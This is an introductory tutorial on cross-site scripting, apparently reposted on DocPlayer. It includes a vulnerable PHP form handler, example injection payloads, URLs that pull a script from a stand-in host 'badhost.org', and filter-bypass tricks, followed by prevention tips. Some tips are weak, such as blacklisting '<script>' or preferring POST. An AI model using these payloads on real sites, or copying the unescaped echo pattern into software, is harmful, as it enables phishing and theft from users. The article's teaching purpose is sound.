Understanding Cross Site Scripting



Similar documents
c. Write a JavaScript statement to print out as an alert box the value of the third Radio button (whether or not selected) in the second form.

A Tale of the Weaknesses of Current Client-side XSS Filtering

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

Uploaded images filter evasion for carrying out XSS attacks

A Tale of the Weaknesses of Current Client-Side XSS Filtering

Check list for web developers

SECURE APPLICATION DEVELOPMENT CODING POLICY OCIO TABLE OF CONTENTS

AMIT KLEIN, FORMER DIRECTOR OF SECURITY AND RESEARCH, SANCTUM

Protection, Usability and Improvements in Reflected XSS Filters

Intell-a-Keeper Reporting System Technical Programming Guide. Tracking your Bookings without going Nuts!

Working with forms in PHP

Cross Site Scripting Prevention

Configuring iplanet 6.0 Web Server For SSL and non-ssl Redirect

Exploits: XSS, SQLI, Buffer Overflow

Website Login Integration

JavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK

2- Forms and JavaScript Course: Developing web- based applica<ons

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Attacks on Clients: Dynamic Content & XSS

Understanding Sql Injection

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Project 2: Web Security Pitfalls

Client-side Web Engineering From HTML to AJAX

Further web design: HTML forms

Phishing by data URI

Recommended Practice Case Study: Cross-Site Scripting. February 2007

Cross-Site Scripting

Internet Technologies

SQL Injection for newbie

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

SUBJECT CODE : 4074 PERIODS/WEEK : 4 PERIODS/ SEMESTER : 72 CREDIT : 4 TIME SCHEDULE UNIT TOPIC PERIODS 1. INTERNET FUNDAMENTALS & HTML Test 1

Cross Site Scripting in Joomla Acajoom Component

XSS-GUARD : Precise Dynamic Prevention of Cross Site Scripting (XSS) Attacks

Cross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

HTML Form Widgets. Review: HTML Forms. Review: CGI Programs

Web Application Security Considerations

Web Application Exploits

JavaScript and Dreamweaver Examples

Yandex.Widgets Quick start

DIPLOMA IN WEBDEVELOPMENT

HTML Tables. IT 3203 Introduction to Web Development

Fortigate SSL VPN 4 With PINsafe Installation Notes

SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Web Application Security

Finding Your Way in Testing Jungle. A Learning Approach to Web Security Testing.

Øredev Web application testing using a proxy. Lucas Nelson, Symantec Inc.

PHP Authentication Schemes

In order for the form to process and send correctly the follow objects must be in the form tag.

Recent Advances in Web Application Security

Abusing HTML5. DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA

TIME SCHEDULE OBJECTIVES

Fortigate SSL VPN 3.x With PINsafe Installation Notes

HOD of Dept. of CSE & IT. Asst. Prof., Dept. Of CSE AIET, Lko, India. AIET, Lko, India

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

Criteria for web application security check. Version

Bypassing Internet Explorer s XSS Filter

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert

HTTP Response Splitting

Defending against XSS,CSRF, and Clickjacking David Bishop

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Complete Cross-site Scripting Walkthrough

Intrusion detection for web applications

3M Information Technology

Security features of ZK Framework

(WAPT) Web Application Penetration Testing

Sidste chance for Early Bird! Tilmeld dig før d. 30. juni og spar DKK. Læs mere og tilmeld dig på

The risks borne by one are shared by all: web site compromises

Client vs. Server Implementations of Mitigating XSS Security Threats on Web Applications

Last update: February 23, 2004

Using Foundstone CookieDigger to Analyze Web Session Management

A Novel Frame Work to Detect Malicious Attacks in Web Applications

Application security testing: Protecting your application and data

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)

Sample HP OO Web Application

WEB PROGRAMMING LAB (Common to CSE & IT)

WIRIS quizzes web services Getting started with PHP and Java

CTF Web Security Training. Engin Kirda

CS 558 Internet Systems and Technologies

Sitefinity Security and Best Practices

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Web Application Guidelines

Are AJAX Applications Vulnerable to Hack Attacks?

Stopping SQL Injection and. Manoranjan (Mano) Paul. Track: Operating Systems Security - Are we there yet?

Full URLs, specified in RFC 3986 have up to eight parts.

A Survey on Threats and Vulnerabilities of Web Services

Your Guide to Security

Phishing with Super Bait

HTML Forms and CONTROLS

WEB ATTACKS AND COUNTERMEASURES

How To Fix A Web Application Security Vulnerability

Auditing mailing scripts for web app pentesters

The Top Web Application Attacks: Are you vulnerable?

MASTERTAG DEVELOPER GUIDE

Towards More Security in Data Exchange

Cyber Security Workshop Ethical Web Hacking

10CS73:Web Programming

Transcription:

Understanding Cross Site Scripting Hardik Shah

Understanding cross site scripting attacks Introduction: there are many techniques which a intruder can use to compromise the webapplications. one such techniques is called XSS or CSS or cross site scripting. With the help of such vulnerability intruder can easily use some social engineering trick to PHISH the important data of a user. it can also invoke an automated script to perform some operations. In this article I will try to show you how such attacks are performed and what precautions you need to maker sure that you don t lost you valuable details and other important information. Basics: there are many webapplications which are designed to permit the input of html tags for displaying the html formatted data. these tags can be used by malicious users to attack other users by inserting scripts or malicious applets etc.this called cross site scripting or XSS. such attacks are result of poor input validations. it uses the combination of html and scripting languages. with the proper combination of html and java script a intruder can misguide the client and perform various attack from DOS(by opening enormous amount of window on client side) or By embedding malicious FORM tags at the right place, an mailicious user may be able to trick users into revealing sensitive information by modifying the behavior of an existing form or by embedding scripts, an intruder can cause various problems. This is by no means a complete list of problems, but hopefully this is enough to convince you that this is a serious problem. How it is performed: Suppose we are using a application which takes some data from the user say username and password. then it is displaying that data. now if this data is not vailidates properly then it can creates some real surprise as we can see bellow. consider the following code in php which takes some data and then it will display it: **code listing for test_submit.php** <? $Name=$_POST['name']; echo "<html> <body>"; echo $Name;

echo" </body> </html>";?> Now it is clear tht the data is posted from a form. assume tht previous form contains a textbox called name.so it will have something similler coding: **code listing for test.php** <html> <head> <title> xss test page </title> </head> <body> <form name="form1" action="test_sub.php" method="post"> Name:<input type="text" name="name"> <input type="submit" value="submit"> </body> </html> Now when a user press the submit button the data in textbox get passed to another form test_submit.php.as from the coding it is clear that the posted data is stored in a variable called name. So from above it is clear that if a user post a simple value then it is simply displayed on the screen but If suppose a user enter following in the name field: <script language=javascript>alert(document.name);</script> Then he will get a msgbox as shown in the following picture:

So from the picture it is clear that if the entered data is not validated properly then a malicious user can execute his own html or script code.this can lead to a potentially dangerous situation. specially if your application is storing critical information and if you have something from which a attacker can be benefited. with a combmination of html and java script a attacker can misguide user and can spoof there real identity. Misc techniques for using XSS: there are various ways by which an attacker can insert the malicious code in to your webapplications. some of them are shown below: 1) Inline Scripting : in this kind of attack the data is passed to the some variables as shown bellow. now if there is an xss vulnerability presented in the site then on clicking on the following url the BadScirpt on the attackers server get executed. http://goodhost.com/search.php?val=<script SRC='htt p://badhost.org/badscirpt.js'></ SCRIPT>

2) Forced Error Responses : This insertion usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data. http://goodhost.com/<script>code</script> 3) Non Script Events: As the client cursor moves over the bolded text, an intrinsic event occurs and the JavaScript code is executed. <b OnMouseOver="self.location.href='http://badhost.org/'">bolded text</b> Some more advanced techniques: There are many application which filters out the data to avoid the XSS attacks. but some of them are genral validations and a malicious can easily bypass this using a littil amount of brain, as shown bellow: 1)replacing Html tags: this is a genral techniq used by programmer for protecting from the xss attacks.genrally programmer replaces the tags like < or > and others with &lt and &gt and such alternatives.allhthouhg this method can provide protection from a less experience user but if a mailicious user is smart enough then he can bypass this techiniq very easily as shoen bellow: Genrally following statement is used to replace the charcters : document.write(cleansearchstring('<>') ); but this can be easily bypass if a user enters the \x3c and \x3 e which are alternative way to represent the < and > characters.

2)Code Commenting : sometimes programmer sued a dangorus way of simply commenting out the script characters like < or any other.so when a suer enters such characters then this characters are simply placed in bettwen comment tags.so that it can not be executed at runtime.but a comment can be sometime used to bypass the xss protection.consider the following example: <COMMENT> <! code (NOT PARSED BY FILTER) // > </COMMENT> Now you all know how to bypass this kind of code.we can simply enter a comment tag to bypass it. As shown bellow: <COMMENT> <! > </ COMMENT> Mailicious_Code_Here </COMMENT> This kind of protection can be easily bypassed using simple techniques. So What can an attacker do with this?how it affect my webapplication?

This is the question a genral webdeveloper ask.it Is neeceesarry for any developer to secure his application from such attacks otherwise it may cause worst effect on you and your client both.an attacker can perform any of the following operations if such attacks exist: 1)he can redirect the posted data to his own server rather then where you intended to submit it. 2)he can misguide your customer to a fake form created and hosted on his server and can gather the important information such as credit card number,login,password and other credintentials. 3)an attacker invole automated script to perform many operations like getting data storing in to databases etc. 4)an attacker can use internal resources of server by refrencing then from your webapplications. This is just to list a few.there are many which can be done and valuable information can be obtain from your customer. How to protect from such attacks? A straightforward solution to this problem is disabling the scripting language!!!but due to many reasons it is not possible to use this solutions. there are various ways by which such kind of attacks can be prevented.

1)Always properly validate the data: to secure your webapplications from such attacks it is necessary to check the user data for any unnecessary characters or input strings.please make sure that u check the POST data, URL strings, Cookies etc and remove any unwanted character or string like <script> etc from it. this is the genral way from where a mailicious user try to compromise your webapplication 2) Limit Input Lengths: this is another way of securing your webapplications from malicious inputs.always make sure that you restrict the length of the variables u want to use in ur applications and check them properly for any violations. 3)Use HTTP POST Method rather then Using GET: GET makes ur webapplication more vulnerable to such kind of attacks as some one can easily play with the input. If possible prefer post method then using GET method. 4)Verify the cookie data: webapplication uses cookie for managing the state of communication.as it is stored on client side,it is necessary to check the cookie data before u use it. 5)Filter Output: Always filter out the output content ur going to display. it will reduces the chance of XSS attacks.try to use proper encoding for it Hardik Shah

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information